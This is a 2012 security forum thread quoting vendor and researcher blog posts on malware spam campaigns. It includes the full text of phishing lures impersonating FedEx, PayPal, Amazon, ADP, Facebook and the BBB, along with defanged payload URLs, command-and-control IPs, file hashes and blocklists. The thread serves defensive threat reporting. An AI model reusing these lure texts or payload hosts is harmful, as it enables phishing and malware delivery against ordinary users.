Sample spamvertised URL re-director: hxxp ://www.mysnap .com.tw/sites/default/files/upload.htm?RANDOM_CHARACTERS
Client-side exploits serving URL: hxxp ://moneymakergrow .ru:8080/forum/links/column.php
Malicious domain name reconnaissance:
moneymakergrow .ru – 202.180.221.186, AS24496; 203.80.16.81, AS24514; 207.126.57.208
Name server: ns1.moneymakergrow .ru – 62.76.178.233
Name server: ns2.moneymakergrow .ru – 132.248.49.112
Name server: ns3.moneymakergrow .ru – 84.22.100.108
Name server: ns4.moneymakergrow .ru – 65.99.223.24
... Although we couldn’t reproduce the client-side exploitation, we’ve already seen the majority of these malicious domains in previously profiled campaigns..."
___
Bogus ‘End of August Invoices’ emails serve malware and client-side exploits
- http://blog.webroot.com/2012/11/30/bogus-end-of-august-invoices-themed-emails-serve-malware-and-client-side-exploits/
Nov 30, 2012 - "Cybercriminals have recently launched yet another massive spam campaign attempting to trick users into clicking on malicious links or executing malicious attachments found in the spamvertised emails...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/11/august_invoices_email_spam_malware_exploits.png
Sample detection rate for the malicious attachment: MD5: 8b194d05c7e7f96a37b1840388231791 * ... Trojan:Win32/Ransom
Sample client-side exploits serving URL: hxxp ://forumibiza .ru:8080/forum/links/column.php
Although we couldn’t obtain the actual payload, the gathered intelligence indicates that this is a campaign launched by the same group that we’ve been monitoring for a few weeks now, allowing us to more effectively expose their campaigns and protect Internet users...
Malicious domain name reconnaissance:
forumibiza.ru – 65.99.223.24, AS30496; 103.6.238.9, AS21125; 203.80.16.81, AS24514
Name server: ns1.forumibiza .ru – 62.76.186.190
Name server: ns2.forumibiza .ru – 84.22.100.108
Name server: ns3.forumibiza .ru – 50.22.102.132
Name server: ns4.forumibiza .ru – 213.251.171.30
... malicious domains also respond to the same IPs (65.99.223.24; 103.6.238.9; 203.80.16.81). We’ve already seen these in several previously profiled malicious campaigns..."
(More detail at the webroot URL above.)
* https://www.virustotal.com/file/d86d78abfa69924c8ce84ef25c957bd06bd22861d06844817c1484fb763a2c2a/analysis/1353823689/
File name: Invoices.exe
Detection ratio: 39/44
Analysis date: 2012-11-25
___
(Here they come...) Santa SCAMS...
- http://community.websense.com/blogs/securitylabs/archive/2012/11/30/personalized-letters-from-scamta-claus.aspx
Nov 30, 2012 - "... detected a marked increase in spam emails seeking to exploit fans of the big man himself: Santa Claus... They claim to offer alternative services to ensure that your "little ones" receive personalized responses from Santa. As is often the case in today’s unsolicited email world, the links within these emails don’t take you to a reputable and Santa-approved communication facilitator. Rather than being prompted for personal details about your little ones (which in itself poses an interesting discussion of internet safety and the sharing of personal details with random websites) you’ll probably find that you’re either a winner, or a potential winner, of some new fruit-branded hardware. All you have to do is complete a survey or an affiliate offer...
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/securitylabs/7360.santa1.png
... subject lines to catch your attention and elicit a response:
- Personal Letter From Santa For Your Child
- (A) Letter From Santa For Your Child
- Santa Claus Letters
- A personal letter from Santa for your little ones
- Custom Santa Letters
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/securitylabs/7848.santa2.png
Clicking the "Click Here" links within many of these messages directs you to an official-looking web-browser opinion survey, tailored to the browser from which you are viewing the page: Simple browser detection and IP geolocation techniques are used to appear convincing.
Unfortunately, other than the opinion survey, the only personalized item you’re likely to receive from this point on is more spam, scams, or empty offers. No amount of form-filling, survey submissions, or offer completions are likely to result in the desired letter from Santa Claus. Therefore, if you are looking to assist Santa with his letter-sending duties, please stick to reputable organizations. Many charities, for example, provide this service legitimately..."
___
"Copies of Policies" SPAM / podarunoki .ru
- http://blog.dynamoo.com/2012/11/copies-of-policies-spam-podarunokiru.html
30 Nov 2012 - "This spam leads to malware on podarunoki .ru:
Date: Fri, 30 Nov 2012 04:54:30 -0300
From: Jone Castaneda via LinkedIn [member@linkedin.com]
Subject: RE: Leonie - Copies of Policies.
Unfortunately, I cannot obtain electronic copies of the Ocean, Warehouse or EPLI policy.
Here is the Package and Umbrella,
and a copy of the most recent schedule.
Leonie Doyle,
==========
Date: Fri, 30 Nov 2012 02:32:21 -0400
From: sales1@[victimdomain].com
Subject: RE: Samson - Copies of Policies.
Unfortunately, I cannot obtain electronic copies of the Ocean, Warehouse or EPLI policy.
Here is the Package and Umbrella,
and a copy of the most recent schedule.
Samson Henry,
The malicious payload is at [donotclick]podarunoki .ru:8080/forum/links/column.php hosted on some familiar IP addresses which should be blocked if you can:
202.180.221.186 (GNet, Mongolia)
203.80.16.81 (MYREN, Malaysia)..."
___
iTunes SPAM / mokingbirdgives .org
- http://blog.dynamoo.com/2012/11/itunes-spam-mokingbirdgivesorg.html
30 Nov 2012 - "This fake iTunes spam leads to malware on mokingbirdgives .org:
From: iTunes itunes @ new .itunes .com
To: purchasing [purchasing @victimdomain .com]
Date: 30 November 2012 17:02
Subject: Your receipt #16201509085048
Billed To:
%email%
Order Number: M1V008146011
Receipt Date: 30/11/2012
Order Total: $699.99
Billed To: Credit card
Item Number Description Unit Price
1 Postcard (View\Download )
Cancel order Not your order?Report a Problem $699.99
Subtotal: $699.99
Tax: $0.00
Order Total: $699.99
Please retain for your records.
Please See Below For Terms And Conditions Pertaining To This Order.
Apple Inc.
You can find the iTunes Store Terms of Sale and Sales Policies by launching your iTunes application and clicking on Terms of Sale or Sales Policies
FBI ANTI-PIRACY WARNING
UNAUTHORIZED COPYING IS PUNISHABLE UNDER FEDERAL LAW.
Answers to frequently asked questions regarding the iTunes Store can be found at http ://www.apple .com/support/itunes/store/
Apple ID Summary • Detailed invoice
Apple respects your privacy.
Copyright © 2011 Apple Inc. All rights reserved
The malicious payload is at [donotclick]mokingbirdgives .org/less/demands-probably.php (report here) hosted on 184.82.100.201 (HostNOC, US) along with the following domains which also appear to be malicious: ..."
(Long list at the dynamoo URL above..)
:mad: :mad: :mad:
AplusWebMaster
2012-12-03, 08:53
FYI...
Malicious email MMS targets mobile phone users
- http://community.websense.com/blogs/securitylabs/archive/2012/12/02/Malicious-email-MMS-targets-mobile-phone-users.aspx
2 Dec 2012 - "... Websense... has detected a malicious spam campaign that tries to exploit customers of major mobile phone companies. Specifically, we have detected thousands of emails claiming users have received MMS content via email localized to Australian and German carriers late last week:
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/securitylabs/3731.both.png
Because mobile phone use is an everyday activity, users could be tricked into opening and running attachments, especially those that appear to come from their carriers. Once the malware is launched, it connects to a list of remote servers to download more malicious binaries. What is interesting about these samples is that they are heavily encrypted and have many anti-debug tricks. Unlike other malware, this sample deploys several decryption phases before finally executing its malicious function. Even more interesting, it implements all its tricks, like decryption and patching, only in memory... It downloads malicious binaries from these remote servers:
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/securitylabs/6523.8_5F00_downloader.jpg
173.254.28.81 ... During our analysis, some of the remote servers were still available, and the malicious binary files were still downloadable..."
___
More Wire Transfer SPAM / panamechkis .ru
- http://blog.dynamoo.com/2012/12/wire-transfer-spam-panamechkisru.html
3 Dec 2012 - "This fake wire transfer spam leads to malware on panamechkis .ru:
Date: Mon, 3 Dec 2012 11:34:38 +0330
From: HarrisonCrumm @ mail .com
Subject: RE: Wire Transfer cancelled
Dear Customers,
Wire transfer was canceled.
Rejected transfer:
FED NUMBER: 1704196955WIRE580676
Transaction Report: View
Federal Reserve Wire Network
The malicious payload is at [donotclick]panamechkis .ru:8080/forum/links/column.php hosted on:
113.197.88.226 (ULNetworks, Korea)
202.180.221.186 (GNet, Mongolia)
203.80.16.81 (MYREN, Malaysia)
Of these, 113.197.88.226 seems to be a new one which should be added to your blocklists."
___
GFI Labs Email Roundup for the Week
- http://www.gfi.com/blog/gfi-labs-email-roundup-for-the-week-4/
Dec 3, 2012 - "... noteworthy spam samples found and documented by our researchers in the AV Labs in our Tumblr page*..."
* http://gfisoftware.tumblr.com/
NY Better Business Bureau Attachment Spam - December 03, 2012
Malicious HP ScanJet Spam Continue - December 03, 2012
Malicious Wire Transfer Spam Continued - Dec 3, 2012
Account has been blocked - Dec 2, 2012
RapidFAX Spam - Dec 3, 2012
NACHA Spam: Your Direct Deposit software is out of date
eFax Corporate Message Spam - Nov 29, 2012
Malicious FedEx Spam Continues - Nov 24, 2012 ...
___
http://www.ironport.com/toc/media/toc_threat_level_3.gif
- http://www.ironport.com/toc/
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Malicious Personal Pictures Attachment E-mail Messages - December 04, 2012
Fake Scanned Document E-mail Messages - December 04, 2012
Malicious Attachment E-mail Messages - December 04, 2012
Fake Picture Link E-mail Messages - December 04, 2012
Fake Tax Refund Notification E-mail Messages - December 04, 2012
Fake Credit Card Transaction Notification E-mail Messages - December 04, 2012
Fake Scanned Document E-mail Messages - December 03, 2012
Fake ADP Digital Certificate Notification E-mail Messages - December 03, 2012
Fake Business Complaint E-mail Messages - December 03, 2012
Fake FedEx Shipment Notification E-mail Messages - December 03, 2012
Fake Xerox Scan Attachment E-mail Messages - December 03, 2012
Fake Picture Link E-mail Messages - December 03, 2012
Malicious Personal Pictures Attachment E-mail Messages - December 03, 2012
Fake Picture Posting Notification E-mail Messages - December 03, 2012
Fake Discount Purchases Notification E-mail Messages - December 03, 2012
Fake Telegram Notification E-mail Messages - December 03, 2012 ...
:mad:
AplusWebMaster
2012-12-04, 14:38
FYI...
Fake FedEx emails lead to malware
- http://blog.webroot.com/2012/12/04/fake-fedex-tracking-number-themed-emails-lead-to-malware/
Dec 4, 2012 - "At the end of October, a cybercriminal or group of cybercriminals launched three massive spam campaigns in an attempt to trick users into clicking on a deceptive link and downloading a malicious attachment. Upon execution, the malware phones back to the command and control servers operated by the party that launched it, allowing complete access to the infected PC. This time they didn’t try impersonating USPS, UPS or DHL, but FedEx...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/12/fedex_tracking_number_email_spam__malware.png?w=481
Second screenshot of a sample spamvertised email, again, part of the same campaign:
> https://webrootblog.files.wordpress.com/2012/12/fedex_tracking_number_email_spam__malware_second_email_template.png?w=545
Third screenshot of a sample spamvertised email used in the campaign:
> https://webrootblog.files.wordpress.com/2012/12/fedex_tracking_number_email_spam__malware_third_email_template.png?w=495
Sample detection rate for the first sample: MD5: 0e2e1ef473bb731d462fb1c8b3dd7089 * ... Trojan.Win32.Buzus.mruv
Upon execution, it phones back to the following URLs:
hxxp ://91.121.90.80 :8080/...
hxxp ://84.40.69.119 :8080/...
hxxp ://211.172.112.7 :8080/...
Sample detection rate for the second sample: MD5: ab25d6dbf9b041c0a7625f660cfa17aa ** ... Trojan-Dropper.Win32.Dapato.bxhg
Upon execution, it phones back to the following URLs:
hxxp //59.25.189.234 :8080/...
hxxp //140.135.66.217 :8080/...
hxxp //82.113.204.228 :8080/...
hxxp //59.126.131.132 :8080/...
None of these IPs currently respond to any specific domains, besides 59.126.131.132.
songwriter .tw is currently responding to 59.126.131.132 – Email: songwriter .tw@ gmail .com...
> https://webrootblog.files.wordpress.com/2012/12/fedex_tracking_number_email_spam__malware__compromised_server.png?w=1024
The domain seems to be a legitimate Taiwanese songwriting company/individual, indicating that their server has been compromised and is currently used as command and control server.
Sample detection rate for the third sample: MD5: 252c797959273ff513d450f9af1d0242 *** ... TrojanDownloader:Win32/Kuluoz.B..."
* https://www.virustotal.com/file/eab57e08c7c8ebae6a003ace72a5174d4b4ef82933dfc951a7bb52b403361e9c/analysis/1354489330/
File name: Postal_Receipt.exe
Detection ratio: 35/46
Analysis date: 2012-12-02
** https://www.virustotal.com/file/2b6ece32653683ec5b123ae2efdde969b29f22d136d2370a7747b02f4bd4fce4/analysis/1354489404/
File name: Postal_Receipt1.exe
Detection ratio: 37/46
Analysis date: 2012-12-02
*** https://www.virustotal.com/file/ecb97f6aa2757746f36c02b41b23103f825291ba21795e8492ec1f4c9c2bcf98/analysis/1354489465/
File name: PostalReceipt2.exe
Detection ratio: 25/46
Analysis date: 2012-12-02
___
"ARK Bureau" fake job offer
- http://blog.dynamoo.com/2012/12/ark-bureau-fake-job-offer.html
4 Dec 2012 - "The ARK Architecture Bureau is a genuine company. This fake job offer is -not- from ARK Bureau, but is some sort of illegal activity such as money laundering.
From: Odette Holcomb [mailto:nbnian@esonchem.co.kr]
Sent: 03 December 2012 12:32
Subject: Help wanted.
POSITION: Customer Assistant
ABOUT COMPANY:
ARK Bureau has served hundreds of clients in the United Kingdom, Poland, France and Germany since 1998.
The firm was created by Lorinda Rogers, a young architect of Canadian origin. From its inception, ARK Bureau.s vision for design and construction was based on system approach, incorporating both building and landscape design. That philosophy has always meant the highest quality for our clients. That.s probably why ARK Bureau enjoys a strong loyalty from the past customers.
Now we have open vacancy in the U.S.: Customer Assistant
RESPONSIBILITIES:
- Process payments from customers;
- Filing invoices, statements and associated documents;
- Meet and exceed performance and time management goals;
- Other duties as required.
GENERAL SKILLS:
- High communication skills;
- Strong problem solving and planning skills;
- Experienced computer & internet user.
APPLY:
To apply please: arkbureaumanager @nokiamail .com
An alternative version uses the email address of arkbureau_manager @nokiamail .com. The two samples that I have seen have originating IP addresses of 174.52.171.8 (Comcast, US) and 109.173.54.245 (NCNET, Russia). You should give this fake company a wide berth unless you want to end up in serious trouble with law enforcement."
___
ADP SPAM / fsblimitedrun .pro
- http://blog.dynamoo.com/2012/12/adp-spam-fsblimitedrunpro.html
3 Dec 2012 - "This fake ADP spam leads to malware on fsblimitedrun .pro:
From: ADP Transaction Status
Date: 3 December 2012 17:55
Subject: ADP Major Accounts Processed Case
Valued customer:
James lately covered Transaction at your account. Event # 433933082.
Case Caption: 6CO7
Incident Substantiation: Download
We at ADP obtain to create a personalized and client focused experience with every client interaction.
Please view transaction changed by visiting the link below.
Click here - ADP Major Accounts Operation Progress mentioned above
Best Wishes,
James Brooks
Vice President of Customer Care Department ADP
ADP Major Accounts
***Reminder***
Please remember to complete your Semi-Annual Service Quality Survey!
Our Goal is to ensure you are VERY SATISFIED with each interaction you have with our Service Associates and we ask that you consider your overall experience in the 6 months preceding your receipt of the survey. We strive to provide WORLD CLASS SERVICE and determine our success by your satisfaction with ADP's services.
**********
This e-mail was delivered from an robot account.
Please don't reply to this message. auomatic informational system unable to accept incoming email.
The malicious payload is at [donotclick]fsblimitedrun .pro/detects/survey_success-complete.php hosted on 41.215.225.202 (Essar Wireless Kenya Ltd) along with the following malicious domain: fdic-update-install .info . Blocking access to this IP address would probably be prudent.
___
"Scan from a Hewlett-Packard ScanJet" SPAM / somaliaonfloor .ru
- http://blog.dynamoo.com/2012/12/scan-from-hewlett-packard-scanjet-spam.html
3 Dec 2012 "This fake printer spam leads to malware on somaliaonfloor .ru:
Date: Mon, 3 Dec 2012 09:25:59 -0600
From: Bebo Service [service@noreply.bebo.com]
Subject: Fwd: Re: Scan from a Hewlett-Packard ScanJet #3838
A document was scanned and sent to you using a Hewlett-Packard HP15310290
Sent to you by: ROSIO
Pages : 8
Filetype(s): Images (.jpeg) View
==========
Date: Mon, 3 Dec 2012 11:06:22 -0500
From: "service@paypal.com" [service@paypal.com]
Subject: Re: Fwd: Scan from a Hewlett-Packard ScanJet 33712789
A document was scanned and sent to you using a Hewlett-Packard HP8220647
Sent to you by: CLAUDIA
Pages : 7
Filetype(s): Images (.jpeg) View
The malicious payload is at [donotclick]somaliaonfloor .ru:8080/forum/links/public_version.php hosted on the same IPs used in this attack.
113.197.88.226 (ULNetworks, Korea)
202.180.221.186 (GNet, Mongolia)
203.80.16.81 (MYREN, Malaysia)..."
___
"Most recent events on Facebook" SPAM / attachedsignup .pro
- http://blog.dynamoo.com/2012/12/most-recent-events-on-facebook-spam.html
4 Dec 2012 - "This fake Facebook spam leads to malware on Most recent events on attachedsignup .pro:
Date: Tue, 4 Dec 2012 15:19:16 +0100
From: " Facebook Security Team" [fractionallyb9 @hendrickauto .com]
Subject: Most recent events on Facebook
facebook
Hi [redacted],
You have closed your Facebook account. You can rebuild your account whenever you wish by logging into Facebook using your current login email address and password. Subsequently you will be able to take advantage of the site as usually.
Please use the link below to reactivate :
http://www.facebook.com/home.php
If this was you, please pass over this informer. If this wasn't you, please secure your account, as some outlaw person may be explore it.
Best regards, The FaceBook Team
Please note: Facebook will never ask for your personal data through email.
This message was sent to [redacted] from your profile details. Facebook, Inc., Attention: Department 437, PO Box 20000, Palo Alto, CA 96906
The malicious payload is at [donotclick]attachedsignup .pro/detects/links-neck.php (report here*) hosted on 41.215.225.202 (Essar Wireless Kenya Ltd) which also hosts the probably malicious domain sessionid0147239047829578349578239077 .pl..."
* http://wepawet.iseclab.org/view.php?hash=11f118205af1e6914d99b42e729ae9a0&t=1354631759&type=js
___
US Airways SPAM / attachedsignup .pro
- http://blog.dynamoo.com/2012/12/us-airways-spam-attachedsignuppro.html
4 Dec 2012 - "This fake US Airways spam leads to malware on attachedsignup .pro:
From: US Airways - Booking [reservations @myusairways .com][
Date: 4 December 2012 14:30
Subject: US Airways online check-in.
You can check in from 24 hours and up to 60 minutes before your flight (2 hours if you're flying internationally). After that, all you have to do is print your boarding pass and go to the gate.
Purchase code: 183303
Check-in online: Online booking details
Payment method: Credit card
Money will be withdrawn in next 3 days
Voyage
5990
Departure city and time
Massachusets MA (DCA) 10:10 AM
Depart date: 12/05/2012
We takes care to protect your privacy. Your information is kept private and confidential. For information about our privacy policy visit usairways.com.
US Airways, 145 W. Rio Salado Pkwy, Tempe, AK 93426 , Copyright US Airways , All rights reserved.
The payload and IP addresses are identical to this spam* doing the rounds today."
* http://blog.dynamoo.com/2012/12/most-recent-events-on-facebook-spam.html
___
Facebook "You have notifications pending" SPAM / francese .ru
- http://blog.dynamoo.com/2012/12/facebook-you-have-notifications-pending.html
4 Dec 2012 - "This fake Facebook spam leads to malware on francese.ru:
Date: Tue, 4 Dec 2012 03:38:42 +0000
From: KaseyElleman @victimdomain .com
Subject: You have notifications pending
facebook
Hi,
Here's some activity you may have missed on Facebook.
SALLIE FELIX has posted statuses, photos and more on Facebook.
Go To Facebook
See All Notifications
This message was sent to postinialerts@[redacted]. If you don't want to receive these emails from Facebook in the future or have your email address used for friend suggestions, please click: unsubscribe.
Facebook, Inc. Attention: Department 415 P.O Box 10005 Palo Alto CA 94303
The malicious payload is at [donotclick]francese .ru:8080/forum/links/column.php hosted on the following IP addresses:
42.121.116.38 (Aliyun Computing Co, China)
202.180.221.186 (GNet, Mongolia)
203.80.16.81 (MYREN, Malaysia)
208.87.243.131 (Psychz Networks , US)
219.255.134.110 (SK Broadband, Korea)
Plain list for copy-and-pasting:
42.121.116.38
202.180.221.186
203.80.16.81
208.87.243.131
219.255.134.110 ..."
:mad::mad:
AplusWebMaster
2012-12-05, 15:40
FYI...
Zbot sites to block 5/12/12
- http://blog.dynamoo.com/2012/12/zbot-sites-to-block-51212.html
5 Dec 2012 - "These domains and IPs are involved in malware distribution, especially the Zbot trojan. Most are using the nameservers in the dnsnum10 .com domain, or are co-hosted on the same server and have malicious characteristics. I've come up with a recommended blocklist based on the characteristics on the netblocks in question. If you are based in Russia, Ukraine, Poland or Iran then you may want to review these carefully.
IP addresses and hosts
31.184.244.73 (TOEN Incorporated, UAE)
62.122.74.47 (Leksim, Poland)
77.72.133.69 (Colobridge, Germany)
78.46.205.130 (Hetzner, Germany)
78.140.135.211 (Webazilla, Gibraltar)
85.143.166.132 (PIRIX, Russia)
87.107.121.131 (Soroush Rasanheh Company Ltd, Iran)
91.211.119.56 (Zharkov Mukola Mukolayovuch, Ukraine)
91.231.156.25 (Sevzapkanat-Unimars, Russia)
91.238.83.56 (Standart LLC, Moldova)
146.185.255.161 (Sergeev Sergei Yurievich PE, Russia)
178.162.132.202 (Tower Marketing, Belize)
178.162.134.176 (Silin Vitaly Petrovich, Belarus)
188.93.210.28 (Hosting Service, Russia)
195.88.74.110 (Info Data Center, Bulgaria)
198.144.183.227 (Colocrossing, US)
... Recommended blocklist:
31.184.244.73
62.122.72.0/21
77.72.133.69
78.46.5.128/29
78.140.135.211
85.143.166.0/24
87.107.96.0/19
91.211.119.56
91.231.156.0/24
91.238.83.0/24
146.185.255.0/24
178.162.132.0/24
178.162.134.128/26
188.93.210.28
195.88.74.110
198.144.183.227 ..."
(More detail at the dynamoo URL above.)
___
BBB SPAM / leberiasun .ru
- http://blog.dynamoo.com/2012/12/bbb-spam-leberiasunru.html
5 Dec 2012 - "This fake BBB spam leads to malware on leberiasun .ru:
Date: Wed, 5 Dec 2012 11:32:47 +0330
From: Bebo Service [service @noreply .bebo .com]
Subject: Urgent information from BBB
Attn: Owner/Manager
Here with the Better Business Bureau notifies you that we have received a complaint (ID 243917811)
from one of your customers with respect to their dealership with you.
Please open the COMPLAINT REPORT below to obtain more information on this matter and let us know of your point of view as soon as possible.
We are looking forward to your prompt reply.
Regards,
JONELLE Payne
The malicious payload is at [donotclick]leberiasun .ru:8080/forum/links/column.php (report here) hosted on the following IPs:
42.121.116.38 (Aliyun Computing Co, China)
202.180.221.186 (GNet, Mongolia)
208.87.243.131 (Psychz Networks, US)
219.255.134.110 (SK Broadband, Korea)..."
:mad:
AplusWebMaster
2012-12-06, 17:16
FYI...
SPAM gets Socl ...
- http://www.gfi.com/blog/spam-gets-socl/
Dec 6, 2012 - "Microsoft have thrown open the gates to their new social network, Socl (which has a faint whiff of Pinterest about it and is also pronounced “social”. No, really). It didn’t take spammers very long to sink their claws in... we have all the Canadian Pharmacy spam you can eat...
> http://www.gfi.com/blog/wp-content/uploads/2012/12/soclspam1.jpg
... links all currently lead to a page touting a 404 error... we can only hope Microsoft (will) have a Banhammer in place to deal with what will no doubt be a bump up in bad content as word of the latest social network to hit the ground running spreads across the news. We haven’t come across any Malware links yet, but as with Tumblr, Pinterest and Twitter end-users shouldn’t abandon common sense in favour of shiny, blinky things carrying a sting in the tail..."
___
Amazon SPAM / evokeunreasoning .pro
- http://blog.dynamoo.com/2012/12/amazon-spam-evokeunreasoningpro.html
6 Dec 2012 - "A few different variants of this today, all pretending to be from Amazon and leading to malware on evokeunreasoning .pro:
Date: Thu, 6 Dec 2012 17:32:38 +0200
From: "Amazon . com" [digital-notifier@amazon.com]
Subject: Your Amazon.com order receipt.
Click here if the e-mail below is not displayed correctly.
Follow us:
Your Amazon.com Today's Deals See All Departments
Dear Amazon.com Member,
Thanks for your order, clongmore @arrowuk .com
Did you know you can view and edit your orders online, 24 hours a day? Visit Your Account.
Order Overview:
E-mail Address: [redacted]
Billing Address:
1113 4th Street
Fort North NC 71557-2319,,FL 67151}
United States
Phone: 1-491-337-0438
Order Grand Total: $ 50.99
Earn 3% rewards on your Amazon.com orders with the Amazon Visa Card. Learn More
Order Summary:
Details:
Order #: C47-8578330-3362713
Subtotal of items: $ 50.99
------
Total before tax: $ 50.99
Tax Collected: $0.00
------
Grand Total: $ 50.00
Gift Certificates: $ 0.99
------
Total for this Order: $ 50.99
Find Great Deals on Millions of Items Storewide
We hope you found this message to be useful. However, if you'd rather not receive future e-mails of this sort from Amazon.com, please opt-out here.
2012 Amazon.com, Inc. or its affiliates. All rights reserved. Amazon, Amazon.com, the Amazon.com logo and 1-Click are registered trademarks of Amazon.com, Inc. or its affiliates. Amazon.com, 475 Larry Ave. N., Seattle, MI 83304-6203. Reference: 61704824
Please note that this message was sent to the following e-mail address: [redacted]
The malicious payload is at [donotclick]evokeunreasoning .pro/detects/slowly_apply.php but at the time of writing the domain does not seem to be resolving."
___
Phishing For Bank Account Information
- http://blog.webroot.com/2012/12/06/phishing-for-bank-account-information/
Dec 6, 2012 - "... always on the look out for anything that looks ‘phishy’, even if it’s on your own personal time. Today, I opened my personal email to find this:
> https://webrootblog.files.wordpress.com/2012/11/pic1.png?w=413&h=444
Although the email looked very convincing, I don’t bank with Smile Bank so I knew something was up. Smile Bank is an actual bank based in the UK. The bad guys used a spoofed email address to make it look like it came from the legit Smile Bank domain smile.co.uk. If someone did bank with Smile Bank, I can see how they could easily be tricked. It’s the “Click here to proceed” link that gives the bad guys away. The link goes to a page hosted by pier3 .hk, which is a legitimate domain, but appears to be compromised with a simple HTM page that is a -redirect- to the real malicious site. The redirect sends you here:
> https://webrootblog.files.wordpress.com/2012/11/pic2.png?w=491&h=354
... This trick could easily be done with any large bank. Make sure to always be suspicious of any email claiming to be from your bank that -threatens- your account has been locked and insists that you need to enter your account information. Also, if the link to enter your account information isn’t to the URL of the bank it claims to be from, you know it’s malicious."
___
More "Copies of policies" SPAM / cinemaallon .ru
- http://blog.dynamoo.com/2012/12/copies-of-policies-spam-cinemaallonru.html
6 Dec 2012 - "This spam leads to malware on cinemaallon .ru:
Date: Thu, 6 Dec 2012 06:41:01 -0500
From: Isidro Pierre via LinkedIn [member @linkedin .com]
Subject: RE: ASHTON - Copies of Policies.
Unfortunately, I cannot obtain electronic copies of the Ocean, Warehouse or EPLI policy.
Here is the Package and Umbrella,
and a copy of the most recent schedule.
ASHTON QUINONES,
The malicious payload is at [donotclick]cinemaallon .ru:8080/forum/links/column.php hosted on the following familiar IPs:
202.180.221.186 (Gnet, Mongolia)
208.87.243.131 (Psychz Networks, US)..."
___
Bogus ‘Facebook Account Cancellation Request’ emails serve client-side exploits and malware
- http://blog.webroot.com/2012/12/05/bogus-facebook-account-cancellation-request-themed-emails-serve-client-side-exploits-and-malware/
Dec 5, 2012 - "Facebook users, watch what you click on! Cybercriminals are currently mass mailing bogus “Facebook Account Cancellation Requests“, in an attempt to trick Facebook’s users into clicking on the malicious link found in the email. Upon clicking on the link, users are exposed to client-side exploits which ultimately drop malware on the affected host...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/12/fake_facebook_account_cancellation_email_spam_exploits_malware.png?w=629
... Sample client-side exploits served: CVE-2010-0188; CVE-2011-3544; CVE-2010-0840
Malicious domain name reconnaissance:
lakkumigdc .com – 68.168.100.135 – Email: dolphinkarthi @gmail .com
Name Server: NS1.MACROVIEWTECH .COM – 68.168.100.136
Name Server: NS2.MACROVIEWTECH .COM – 68.168.100.137
Domains responding to the same IP, including domains also registered with the same GMail account...
Upon successsful client-side exploitation, the campaign drops MD5: 8b3979c1a9c85a7fd5f8ff3caf83fc56 * ... PWS-Zbot.gen.aru
Upon execution, the sample creates the following file on the affected hosts:
%AppData%\Ixriyv\emarosa.exe – MD5: A33684FD2D1FA669FF6573921F608FBB
It also creates the following directories:
%AppData%\Ixriyv
%AppData%\Uxwonyl
As well as the following Mutex: Local\{7A4AAF46-5391-8FF9-A32F-78A34C8B50D7}
It then phones back to shallowave.jumpingcrab .com (93.174.95.78) on port 8012. Another similar subdomain on this host (takemeout.jumpingcrab .com), was also seen in a crowdsourced DDoS campaign in 2009..."
* https://www.virustotal.com/file/cef26c9643aa8fd5e73ccbd2d626279e704a44f352c6de6079ee27fd2f136f00/analysis/
File name: 8b3979c1a9c85a7fd5f8ff3caf83fc56
Detection ratio: 3/46
Analysis date: 2012-12-03
___
eBay, PayPal SPAM / ibertomoralles .com
- http://blog.dynamoo.com/2012/12/ebay-paypal-spam-ibertomorallescom.html
6 Dec 2012 - "These spam messages lead to malware on ibertomoralles .com:
Date: Thu, 6 Dec 2012 13:12:16 -0600
From: "PayPal" [service @paypal .com]
Subject: Your Ebay.com transaction details.
Dec 5, 2012 09:31:49 CST
Transaction ID: U5WZP603SNLLWR5DT
Hello [redacted],
You sent a payment of $363.48 USD to Normand Akers.
It may take a several minutes for this transaction to appear in your transactions history.
Seller
Normand-Akers @aol .com
Instructions to seller
You haven't entered any instructions.
Shipping address - confirmed
Hyde Rd
Glendale SC 58037-0659
United States
Shipping details
The seller hasn't provided any shipping details yet.
Description Qty. Amount
NordicTrack Mini Cycle
Item# 118770508253 24 $363.48 USD
Shipping and handling $24.99 USD
Insurance - not offered ----
Total $363.48 USD
Payment $363.48 USD
Payment sent to Normand Akers
Receipt ID: D-69NQRGN113A3A9UQ3
Issues with this transaction?
You have 45 days from the date of the transaction to open a dispute in the Resolution Center.
Please do not reply to this message. auto informer system unable to accept incoming messages. For immediate answers to your issues, visit our Help Center by clicking "Help" located on any PayPal page.
PayPal Email ID PZ147
==========
Date: Thu, 6 Dec 2012 19:57:37 +0100
From: "PayPal" [noreply @paypal .com]
Subject: Your Paypal.com transaction confirmation.
Dec 5, 2012 09:50:54 CST
Transaction ID: 8P7D295HFIIIMUC4Q
Hello [redacted],
You done a payment of $894.48 USD to Carol Brewster.
It may take a few moments for this transfer to appear in your transactions history.
Merchant
Carol-Brewster @aol .com
Instructions to seller
You haven't entered any instructions.
Shipping address - confirmed
Pharetra Street
Manlius NY 74251-6442
United States
Shipping details
The seller hasn't provided any shipping details yet.
Description Qty. Amount
TaylorMade R11 Driver Golf Club
Item# 703099838857 54 $894.48 USD
Shipping and handling $14.49 USD
Insurance - not offered ----
Total $894.48 USD
Payment $894.48 USD
Payment sent to Carol Brewster
Receipt ID: H-K01U2WSTLZZMRAB90
Issues with this transaction?
You have 45 days from the date of the purchase to issue a dispute in the Resolution Center.
Please DO NOT reply to this message. auto-notification system can't accept incoming mail. For fast answers to your subjects, visit our Help Center by clicking "Help" located on any PayPal page.
PayPal Email ID P8695
The malicious payload is at [donotclick]ibertomoralles .com/detects/slowly_apply.php hosted on 59.57.247.185 (Xiamen JinLongLvXingChe, China). The following malicious domains also appear to be hosted on the same server..."
(More detail at the dynamoo URL above.)
:sad: :mad:
AplusWebMaster
2012-12-07, 14:20
FYI...
#1 malware threat - Blackhole exploit kits
- http://h-online.com/-1762913
